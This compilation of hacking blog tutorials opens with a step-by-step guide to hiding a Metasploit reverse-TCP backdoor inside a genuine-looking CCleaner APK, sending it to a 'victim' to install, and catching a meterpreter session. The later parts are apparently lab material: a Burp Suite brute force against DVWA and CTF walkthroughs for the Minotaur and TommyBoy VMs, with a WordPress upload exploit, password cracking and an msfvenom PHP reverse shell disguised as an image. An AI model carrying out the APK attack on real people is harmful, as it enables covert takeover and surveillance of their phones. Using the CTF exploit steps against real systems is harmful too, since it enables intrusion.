Hack Android Phone using Backdoor Apk

Sometimes in hacking we have to use most genuine way so that victim is surely hacked. These genuine ways are to be used for our advantage. One of the most genuine ways to hack an android phone is to bind original android file to your backdoor-apk. This backdoor-apk is software which helps us to bind original apk file with your virus. Hence, taking all the suspicious away from you.

And for this first you have to execute the following command:

apt-get install lib32stdc++6 lib32ncurses5 lib32z1

http://i1.wp.com/3.bp.blogspot.com/-ZqZqijYLQHs/V-fpffCEa8I/AAAAAAAANu4/8DwG2J_LCdkY5o1i_Xjj2rDctgmWrpQXwCLcB/s1600/1.png?w=687&ssl=1

Once the command is execution and installation is done then downloads the backdoor-apk from github and for that type:

git clone https://github.com/dana-at-cp/backdoor-apk.git

http://i0.wp.com/3.bp.blogspot.com/-hYMwWPcsJAI/V-fpdd3XQAI/AAAAAAAANuw/cJB7opl0Ul89UrIU968I2z5kb4XEfqENwCEw/s1600/2.png?w=687&ssl=1

As the software is downloaded, go to the www.apk4fun.com website and download an original apk file like I downloaded ccleaner. And then copy it in the backdoor-apk folder.

Open it in the terminal and type:

./backdoor-apk.sh ccleaner.apk

As the command runs it will ask you for the payload you want to use and for that select 3 and then it will ask you for lhost and lport and give these respectively.

http://i2.wp.com/3.bp.blogspot.com/-5pxYGih7cYY/V-fpgF3gxlI/AAAAAAAANu8/U-dcnzxxFe8tR192aJJkzOsfshdc7pwCACEw/s1600/3.png?resize=670%2C659&ssl=1

The above commands will bind the file to the original apk file and will save it to backdoor-apk>original>dist folder.

http://i1.wp.com/2.bp.blogspot.com/-tQSYqOrL9vI/V-fpfDr-9KI/AAAAAAAANu0/WdHQqSpV5wgLX4Sjhyr9uwOrDCT9NqiSACEw/s1600/4.png?w=687&ssl=1

Now all you have to do is send the file to the victim as he will install it by clicking on next.

http://i0.wp.com/2.bp.blogspot.com/-N7iFFTYnFZI/V-fpgsHOlXI/AAAAAAAANvA/BwJe7iIL3FI7abPfbaop0M8D2z_5ZaV_QCEw/s1600/5.png?resize=370%2C659&ssl=1

And the click on Install to install the app.

http://i2.wp.com/2.bp.blogspot.com/-YYnL9kYeB5M/V-fpg4baCJI/AAAAAAAANvE/LftA9EQtXi47GKRkTEO-XVQeotIOZNKSgCEw/s1600/6.png?resize=370%2C659&ssl=1

This way the app will be downloaded.

http://i2.wp.com/1.bp.blogspot.com/-Nw-D2crv__4/V-fphNbffqI/AAAAAAAANvI/TO7QMkCB2749W_AHb48bxH0uv0CyPXuWQCEw/s1600/7.png?resize=370%2C659&ssl=1

Before opening the app,open metasploit and type :

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.1.126

set lport 4444

exploit

After this when you run the app; you will get meterpreter session.

http://i1.wp.com/2.bp.blogspot.com/-1-RnHI5CT4I/V-fphq7zzAI/AAAAAAAANvM/l0DIzD49aesKDMaOJ_RHYWj6FGz84RUcACEw/s1600/8.png?w=687&ssl=1

Hence hacking the victim genuinely.

Brute Force Website Login Page using Burpsuite (Beginner Guide)

In this article we will learn to prosecute dictionary attack from BurpSuite. And we will try and crack the password of DVWA Lab.

Burp Suite: Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun. Importantly, it gives us another way to manage our attacks as the alternative to metasploit.

To make Burp Suite work, firstly, we have to turn on manual proxy and for that go to the settings and choose Preferences.

Then select advanced option and further go to Network then select Settings.

Now, select Manual proxy Configuration

And this way your manual proxy will be active as you can see below too.

Now, on the other hand open DVWA and log into it using its default username and password.

Once you log in, click on Brute Force. And also make sure that security is low or medium.

When you click on brute force, it will ask you the username and password. Here, before giving username and password open burp suite and select Proxy tab and turn on interception by clicking on Interception is on/off tab.

As you turn on the interception, then give any password you like just so that the burp suite can capture it.

Send the captured material to the intruder by right clicking on the space and choosing Send to Intruder option or simply press ctrl + i

Now open the Intruder tab then select Positions tab and following will be visible:

Choose the Attack type as Cluster Bomb.

Now select username and password as shown below:

In the above image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

So now, go to Payloads tab and the select 1 from Payload set (this ‘1’ denotes the username file). Then click on Load button and browse and select your dictionary file for username.

Now select 2 in the Payload set and again similar give the dictionary file for the password.

Now all you have to do is go to Intruder menu and select Start attack from the drop down menu.

Sit back and relax because now the burp suite will do its work and match the username and password and will give you the correct password and username. The moment it will find the correct value, it will change the value of length as shown:

And to confirm it from the response as it will be “Welcome to the password protected area admin”

And this way its all done.

Shivam Gupta is An Ethical HackerCyber Security Expert, Penetration Tester, India. you can contact here

Hack the Minotaur VM (CTF Challenge)

Minotaur is a Boot2Root CTF challenge which helps us improve our skills especially of password cracking. The VM will assign itself a specific IP address (in the 192.168.56.0/24 range). Do not change this, as the CTF will not work properly without an IP address of 192.168.56. We know to think about it i.e.:

  • One password you will need is not on rockyou.txt or any other wordlist you may have out there. So you need to think of a way to generate it yourself.
  • This CTF has a couple of fairly heavy password cracking challenges, and some red herrings.

You can download this VM from –> https://www.vulnhub.com/entry/sectalks-bne0x00-minotaur,139/

WalkThrough

We will start off by nmap because we already our target IP.

nmap -p- -A 192.168.56.223

As a result of nmap we can see that the port numbers: 22, 80, 2020 are open. We can use port 22 and 80 to our advantage.

Now we tried to explore through nikto and curl but unfortunately we found nothing of use. So we decided to use dirbuster.

Go to the terminal of kali and type :

dirbuster

It will open the dirbuster. In it, give the url in the Target URL box and select directory-list-2.3-medium.txt file in the File with list of dir box.

It will show you the directory called /bull/

Open the said directory in your browser.

It will show that there is a blog made in WordPress.  As the blog is in wordpress we can apply WPScan to find usernames and vulnerable themes and plung-ins. To apply WPScan type:

wpscan -u http://192.168.56.223/bull/ –enumerate u

The command will start executing and it will show you all the plug-ins that is exploitable along with usernames.

As you can see that there is only one user with the username bully. Also, there is plug-in exploit for Slideshow Gallery. But we will require username and password to make this exploit work. Now we already have username and all we need is its password and we have no idea where to find it as we have no dictionary or password file. Therefore we will make a password file using ceWL.

CeWL is a ruby app which traverses a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password cracking. To make a password file from CeWL go to your terminal of your kali and type:

cewl http://192.168.56.223/bull -m 3 -w /root/Desktop/pass.txt

This will create a .txt with list of all the words that have a possibility to be the password for the username bully.

Now to find which its password is we will use BurpSuite. So, apply dictionary attack using burpsuite and the moment it will find the correct password it will change it value of length as shown below:

Now that we know username and password we can use that exploit for the plug-in. And to do so open metasploit and type:

use exploit/unix/webapp/wp_slideshowgallery_upload

set rhost 19.168.56.223

set rport 80

set targeturi /bull/

set wp_user buly

set wp_password Bighornedbulls

exploit

 As the exploit will run it will give you the session of meterpreter. Furthermore type,

shell

echo “import pty; pty.spawn(‘/bin/bash’)” > /tmp/asdf.py

python /tmp/asdf.py

Execution of the above commands will take you to the terminal of your target. Then moving forward enter the /var/www/html folder and type :

ls -lsa

We found a flag here, let’s read it.

cat flag.txt

Then we went into /tmp folder and rread the flag there:

cd /tmp

ls -lsa

cat flag.txt

Now we found two flags but they were not the main flags and also we got a hint that shadow.bak file could be useful to us. Let’s have look in it.

cat shadow.bak

We will take help of John password cracker to find the passwords:

john shadow.bak

We found the passwords for both heffer and minotaur. Please recall that port number 22 i.e. for ssh was open and we can use it to log in and for this type:

ssh [email protected]

Give the password when asked and further check its directories:

ls -lsa

We found a flag here. Read it.

cat flag.txt

Now in the flag we found another flag along with a hint indicating that the flag is Minotaur. Now we will log in through SSH using minotaur:

ssh [email protected]

Give the password when asked. And then check for directories:

ls -lsa

There is another flag available. Again read it.

cat flag.txt

Now, we have finally found the first flag along with another hint that is the final flag is in /root/flag.txt

Moving on, type the following to gain admin access and switch user :

sudo su

cd ..

cd ..

This will take you into the home folder. Here, type :

cd root

ls -lsa

FInally we have fouond the last flag.

cat flag.txt

WOOHOO!!! The flag is captured. Congrats and enjoy!!

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here.

Hack the TommyBoy VM (CTF Challenge)

Tommy Boy VM is a CTF based on the movie Tommy Boy and the fictitious company “Callahan Auto” in the movie. This CTF, Tommy Boy, has been created by Brian Johnson of 7 Minute Security. It is a really fun VM — a few bits of it were fairly easy, some parts of it were really tricky, and there are some pretty neat little tricks in there too.

WalkThrough

Start off with scanning the network to find our target. And we all the command for it is :

netdiscover

We found our target –> 192.168.0.102

Our next step is to scan our target with nmap. We will apply aggressive scan as it is quick.

nmap -A 192.168.0.102

Result shows us that there are 3 ports ope : 22(ssh), 80(http), 8008(http).

Moving on we will use nikto to have detailed information of our target. So for this, type :

nikto -h 192.168.0.102

By using the nikto command we found out that there is a text file with the name of robots.txt which might contain some information. We wanted to have look in it so we opened it up on our browser. And yes, we found our first flag.

Opening the first flag, we found out that there are total of five flags whose combination will open the treasure in our scavenger hunt. Also, of course, we found the first flag i.e. part one of five of a password.

To further explore and find rest of the flags we browsed to port 80 and we greeted with the Callahan Auto page which apparently was experiencing some technical difficulties.

Now, as we were stuck there, we thought about using the curl command. As we all know it provides us with a library and command-line tool for transferring data using various protocols along with so much of detailed information which can we used on various occasions. To use curl type :

curl http://192.168.0.102

Executing the curl command we found a youtube link. No harm in opening it so let us do that.

Opening the youtube link, we know that it has to do something with prehistoric forest. So we decided to use it on the browser as –> 192.168.0.102/prehistoricforext/

And to our luck we found alot of information. First of our information was that the website was made in WordPress.

Knowing the website was made in WordPress, automatically had us use WPScan. And to use it open WPScan in the terminal of Kali and type :

wpscan –url http://192.168.0.102/prehistoricforest –enumerate user

Applying WPScan proved itself useful and we found that there are indeed four users. This information came in handy later.

Further investigating the same “prehistoricforest” page we found other important things like the text file which contained our second flag.

As we opened the text file we had our second flag. Two down, three more to go.

As we found another important clue on the same web page of prehistoric forest we decided to investigate further. And this decision proved right as we found another clue which stated to use /richard instead of /prehistoricforest.

And we did as stated above and we stumbled upon an image.

This image, being as it is, gave us no clue. So we decided to open it with exif. There was no need to use third party software as exif readers was available online. Click on browse option to give the Image.

Investigating the image we find an MD5 hash value.

Go to www.md5cracker.org and crack the md5 code we just discovered. On cracking it we will find that it makes up the word spanky.

Now this spanky word can we our password so if we open the URL : 192.168.0.102/prehistoricforest/ and open one of the comments then it will ask you for the password. So, give the password as spanky.

It will open a page with some hints. Reading it there are only to things to remember :

  • There is something about nickburns
  • There is an FTP port open.

Now, we scanned before and we did not find a FTP port anywhere. So let us scan port by port. And for that type :

nmap -p 1-655535 192.168.0.102

Applying the above scan we can see that there is a port 65534 opened. Now this might be the port where FTP service might have been forwarded too. So, now exploit this port using WinSCP.

Open the WinScp software, givethe target’s IP ans the port number along with the username : nickburns and password : spanky

Import the file readme.txt .

Opening the file you will come across the following :

In the file you will see that he is talking about a subfolder “NickizL33t

Furthermore, we will find the following page :

Now if you pay attention and use common sense you will see that it says “only me and Steve Jobs are allowed to look at this stuff” that means we can read it with i-phone. Now, its obvious that every one of us do not have i-phone so don’t get upset we have substitute for it.

There is Add-on for Mozilla named “User Agent Switcher” which will allow you read the said file.

When you have added this Add-on. Go to the Tools menu. A drop down menu will appear select Default User Agent and from its select iphone 3.0 option.

After doing the said, the page will appear somewhat like the following :

Now he is talking about some .html file. As we have already checked everywhere and didn’t find such file. It’s a possibility that this file was hidden so let’s use DIRBuster to find it.

Open DirBuster, give target’s IP and the path of dictionary file named rockyou.txt

Also, select iphone in Http User Agent

It will show you that there a fallon1.html  hidden file. Upon opening it you will have :

  • A hint
  • Third flag
  • Big Tom’s encrypted pw backups

In hint.txt you will find hints all about the passwords.

And of course in the flag file you will find the third flag i.e. third part of the password with five parts.

Third file will be the one which you will download.

We got all the hints about password we needed. Therefore, we will generate a dictionary file using crunch and for this type :

crunch 13 13 -t bev,%%@@1995 -o /root/Desktop/dict.txt

And then we will crack the password of the zip file we just downloaded using fcrackzip and so type :

fcrackzip -u -D -p /root/Desktop/dict.txt /root/Desktop/t0msp4ssw0rdz.zip

Opening the zip file we have all three usernames and password but one.

Now to have the password for the forth user we will use wpscan :

ruby ./scan.rb –url https://192.168.0.102/prehistoricforest –wordlist /usr/share/wordlists/rockyou.txt –username tom

After about 3 to 4 hours you will have ether password i.e. tomtom1

Now we logged in to the admin page but we did not find anything here except for the fact that there is something on SSH port.

So now, we will try to log in with SSH port.

ssh [email protected]

To see the list of files and folders type :

ls -lsa

As you can see we have achieved the flag four i.e. part four of five of password read the flag :

cat el-flag-numero-quatro.txt

except the flag we have also found the backup file. Copy it so that we can open the home page propery in the browser :

cp callanhanbak.bak /var/www/html/index.html

Now open the it in Browser.

Look up into the page source :

Here you will find a note directing you towards the a folder. Let’s see what it has :

It is the page where you can upload the file. So create the code via msfvenom :

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=444 -f raw

Copy the code from <?php till die();  and save it to a .php file. If it does not uploads your php file you must change its extension to PNG or JPG or GIF to upload it. While you upload the filr start multi/handler before running it by going to metasploit and typing :

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lport 4444

set lhost 192.168.0.106

exlpoit

 And then as you run your uploaded file you will have your meterpreter session. Then type Shell  to reach the shell of the VM.

Now to read the fifth flag the last part of the password type :

cat/.5.txt

And voila!! You have captured all of the five flags that make up to a password which will open the zip file.

So, now unzip the zip file :

unzip LOOT.zip

Once the file is unzipped it will contain the last part of the challenge i.e. a text file. Lets read it and finish this whole thing up :

cat THE-END.txt

HURRAYYY!!! We have Captured all the flags; hence completing the challenge.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here.

Related Posts Plugin for WordPress, Blogger...